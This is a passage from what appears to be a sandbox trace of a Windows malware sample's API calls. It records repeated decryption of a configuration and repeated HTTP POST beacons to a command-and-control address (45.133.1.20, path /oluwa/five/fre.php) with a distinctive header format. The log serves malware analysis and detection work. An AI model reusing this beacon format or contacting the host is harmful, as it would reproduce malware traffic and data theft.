ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0201.844] GetProcessHeap () returned 0x6a0000 [0201.844] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9a0 [0201.844] socket (af=2, type=1, protocol=6) returned 0x548 [0201.844] connect (s=0x548, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0201.871] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0201.871] GetProcessHeap () returned 0x6a0000 [0201.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0201.871] GetProcessHeap () returned 0x6a0000 [0201.871] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c5ef0 [0201.872] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.875] wvsprintfA (in: param_1=0x6c5ef0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0201.875] GetProcessHeap () returned 0x6a0000 [0201.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0201.875] GetProcessHeap () returned 0x6a0000 [0201.875] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.875] GetProcessHeap () returned 0x6a0000 [0201.875] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0201.875] GetProcessHeap () returned 0x6a0000 [0201.876] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c5ef0 [0201.876] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0201.877] wvsprintfA (in: param_1=0x6c5ef0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0201.877] GetProcessHeap () returned 0x6a0000 [0201.877] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0201.877] GetProcessHeap () returned 0x6a0000 [0201.878] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5ef0 | out: hHeap=0x6a0000) returned 1 [0201.878] send (s=0x548, buf=0x6b5c98*, len=242, flags=0) returned 242 [0201.879] send (s=0x548, buf=0x6bb998*, len=159, flags=0) returned 159 [0201.879] GetProcessHeap () returned 0x6a0000 [0201.879] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0201.879] recv (in: s=0x548, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0201.956] GetProcessHeap () returned 0x6a0000 [0201.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0201.956] GetProcessHeap () returned 0x6a0000 [0201.956] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0201.956] GetProcessHeap () returned 0x6a0000 [0201.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0201.957] GetProcessHeap () returned 0x6a0000 [0201.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6befd0 | out: hHeap=0x6a0000) returned 1 [0201.957] closesocket (s=0x548) returned 0 [0201.957] GetProcessHeap () returned 0x6a0000 [0201.957] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9a0 | out: hHeap=0x6a0000) returned 1 [0201.957] GetProcessHeap () returned 0x6a0000 [0201.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0201.958] GetProcessHeap () returned 0x6a0000 [0201.958] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0201.959] GetProcessHeap () returned 0x6a0000 [0201.959] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0201.959] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x690) returned 0x548 [0201.961] Sleep (dwMilliseconds=0xea60) [0201.962] GetProcessHeap () returned 0x6a0000 [0201.962] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0201.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.964] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0201.971] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.971] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0201.981] GetProcessHeap () returned 0x6a0000 [0201.982] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c5718 [0201.982] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.983] CryptImportKey (in: hProv=0x6bef48, pbData=0x6c5718, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0201.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.987] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0201.988] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.988] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0201.988] GetProcessHeap () returned 0x6a0000 [0201.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c5718 | out: hHeap=0x6a0000) returned 1 [0201.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.990] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0201.991] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.992] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0201.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0201.993] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0201.993] GetProcessHeap () returned 0x6a0000 [0201.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0202.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.001] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0202.002] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.002] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0202.003] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.004] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0202.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.005] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0202.005] GetProcessHeap () returned 0x6a0000 [0202.005] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0202.005] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0202.006] GetProcessHeap () returned 0x6a0000 [0202.006] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0202.006] GetProcessHeap () returned 0x6a0000 [0202.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0202.007] GetProcessHeap () returned 0x6a0000 [0202.007] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0202.007] GetProcessHeap () returned 0x6a0000 [0202.007] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0202.008] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.008] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.015] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.018] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0202.025] GetProcessHeap () returned 0x6a0000 [0202.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0202.026] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.030] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0202.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.031] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.032] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.032] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.032] GetProcessHeap () returned 0x6a0000 [0202.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0202.034] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.034] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0202.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.035] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0202.036] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.036] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0202.036] GetProcessHeap () returned 0x6a0000 [0202.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0202.039] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.039] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0202.040] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.040] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0202.043] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.044] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0202.045] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.045] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0202.045] GetProcessHeap () returned 0x6a0000 [0202.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0202.045] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0202.045] GetProcessHeap () returned 0x6a0000 [0202.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba9e0 [0202.045] socket (af=2, type=1, protocol=6) returned 0x54c [0202.046] connect (s=0x54c, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0202.135] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0202.135] GetProcessHeap () returned 0x6a0000 [0202.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0202.135] GetProcessHeap () returned 0x6a0000 [0202.135] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0202.136] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0202.136] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0202.136] GetProcessHeap () returned 0x6a0000 [0202.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bb458 [0202.137] GetProcessHeap () returned 0x6a0000 [0202.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0202.137] GetProcessHeap () returned 0x6a0000 [0202.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4be0 [0202.137] GetProcessHeap () returned 0x6a0000 [0202.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0202.138] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0202.139] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0202.139] GetProcessHeap () returned 0x6a0000 [0202.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6b5c98 [0202.139] GetProcessHeap () returned 0x6a0000 [0202.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0202.140] send (s=0x54c, buf=0x6b5c98*, len=242, flags=0) returned 242 [0202.140] send (s=0x54c, buf=0x6bb998*, len=159, flags=0) returned 159 [0202.140] GetProcessHeap () returned 0x6a0000 [0202.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0202.140] recv (in: s=0x54c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0202.249] GetProcessHeap () returned 0x6a0000 [0202.250] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 [0202.250] GetProcessHeap () returned 0x6a0000 [0202.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0202.251] GetProcessHeap () returned 0x6a0000 [0202.251] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bb458 | out: hHeap=0x6a0000) returned 1 [0202.252] GetProcessHeap () returned 0x6a0000 [0202.253] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0202.253] closesocket (s=0x54c) returned 0 [0202.253] GetProcessHeap () returned 0x6a0000 [0202.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba9e0 | out: hHeap=0x6a0000) returned 1 [0202.255] GetProcessHeap () returned 0x6a0000 [0202.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0202.255] GetProcessHeap () returned 0x6a0000 [0202.255] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0202.255] GetProcessHeap () returned 0x6a0000 [0202.256] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0202.256] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc1c) returned 0x54c [0202.258] Sleep (dwMilliseconds=0xea60) [0202.260] GetProcessHeap () returned 0x6a0000 [0202.260] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0202.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.262] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.271] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0202.278] GetProcessHeap () returned 0x6a0000 [0202.278] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0202.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.280] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0202.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.281] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.282] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.282] GetProcessHeap () returned 0x6a0000 [0202.283] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0202.284] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.284] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0202.285] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.285] CryptDestroyKey (hKey=0x6ad020) returned 1 [0202.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.288] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0202.288] GetProcessHeap () returned 0x6a0000 [0202.288] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0202.289] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.289] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0202.290] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.290] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0202.295] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.295] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0202.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.299] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0202.299] GetProcessHeap () returned 0x6a0000 [0202.299] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0202.299] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0202.299] GetProcessHeap () returned 0x6a0000 [0202.299] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0202.300] GetProcessHeap () returned 0x6a0000 [0202.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0202.300] GetProcessHeap () returned 0x6a0000 [0202.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0202.300] GetProcessHeap () returned 0x6a0000 [0202.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0202.301] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.301] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0202.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.307] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0202.315] GetProcessHeap () returned 0x6a0000 [0202.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0202.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.316] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0202.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.317] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0202.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.318] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0202.318] GetProcessHeap () returned 0x6a0000 [0202.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0202.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.320] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0202.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.321] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0202.321] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0202.322] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0202.322] GetProcessHeap () returned 0x6a0000 [0202.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0202.322] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.323] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0202.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.324] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0202.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.324] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0202.325] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0202.325] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0202.325] GetProcessHeap () returned 0x6a0000 [0202.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0202.325] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0202.325] GetProcessHeap () returned 0x6a0000 [0202.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0202.326] socket (af=2, type=1, protocol=6) returned 0x550 [0202.326] connect (s=0x550, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0202.357] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), 